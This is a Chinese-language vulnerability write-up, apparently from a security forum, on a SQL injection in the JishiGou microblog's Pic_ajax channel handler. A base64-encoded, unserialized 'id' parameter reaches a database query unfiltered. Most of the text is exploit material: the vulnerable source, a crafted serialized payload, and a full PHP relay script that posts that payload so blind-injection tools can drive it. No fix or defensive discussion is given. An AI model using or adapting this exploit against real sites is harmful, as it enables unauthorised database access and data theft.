记事狗微博 注入

/modules/ajax/topic.mod.php

function Pic_ajax()

{//echo 11;

//echo base64_encode(serialize(array('a'=>'0\'#')));

$options = array();

$TopicListLogic = Load::logic('topic_list', 1);

$per_page_num = $this->Post['pp_num'] ? (int)$this->Post['pp_num'] : 20;

$cache_time = $this->Post['c_time'] ? (int)$this->Post['c_time'] : 10;

$uid = $this->Post['uid'] ? $this->Post['uid'] : '';

if($this->Code =='channel'){

$id = $this->Post['id'] ? $this->Post['id'] : ''; //获取

$options = array(

'item'=>'channel',

'item_id' => unserialize(base64_decode($id)),//解码，应为Base64所以无视Gpc。。

'perpage' => $per_page_num,

);

$info = $TopicListLogic->get_data($options);//查询函数 里面也没做任何过滤

get_data($param, $caller = "web")

.....

$item_ids = $this->_process_param($param['item_id']);//这里 赋值

$item = trim($param['item']);

.....

$where_sql = ($perm_sql ? " AND {$perm_sql} " : '').

(isset($param['tid']) ? ' AND `tid` IN ('.jimplode($tids).') ' : '').

($roottids ? ' AND roottid IN ('.jimplode($roottids).') ' : '').

($from ? " AND `from`='{$from}' " : '').

($item_ids ? " AND `item_id` IN (".jimplode($item_ids).") ": '').//写入语句

($item ? " AND `item`='{$item}' " : '').

($content ? " AND `content`='{$content}' " : '').

($content2 ? " AND `content2`='{$content2}' " : '').

($filter_sql ? ' and '.$filter_sql : '');

test

可能注入起来比较麻烦

应为没有回显 只能盲注，

所以我写了个中转程序 丢工具跑

<?php

$data=base64_encode(serialize(array('a'=>'0\') and 1='.$_GET[id].'#')));

$flag = 0;

$post = '';

$errno = '';

$errstr = '';

$host='127.0.0.1';

$path='/jsg';

$argv = array(

'id'=>$data,

);

foreach ($argv as $key=>$value) {

if ($flag!=0) {

$post .= "&";

$flag = 1;

}

$post.= $key."="; $post.= urlencode($value);

$flag = 1;

}

$length = strlen($post);

//创建socket连接

$fp = fsockopen("$host",80,$errno,$errstr,10) or exit($errstr."--->".$errno);

//构造post请求的头

$header= "POST {$path}/ajax.php?mod=topic&code=channel HTTP/1.1\r\n";

$header .= "Host: {$host}\r\n";

$header .= "Referer: /flandy/post.php\r\n";

$header .= "Content-Type: application/x-www-form-urlencoded\r\n";

$header .= "Content-Length: ".$length."\r\n";

$header .= "Connection: Close\r\n\r\n";

//添加post的字符串

$header .= $post."\r\n";

//发送post的数据

fputs($fp,$header);

$inheader = 1;

while (!feof($fp)) {

$line = fgets($fp,1024); //去除请求包的头只显示页面的返回数据

if ($inheader && ($line == "\n" || $line == "\r\n")) {

$inheader = 0;

}

if ($inheader == 0) {

echo $line;

}

}

fclose($fp);

?>

跑起来的速度还凑合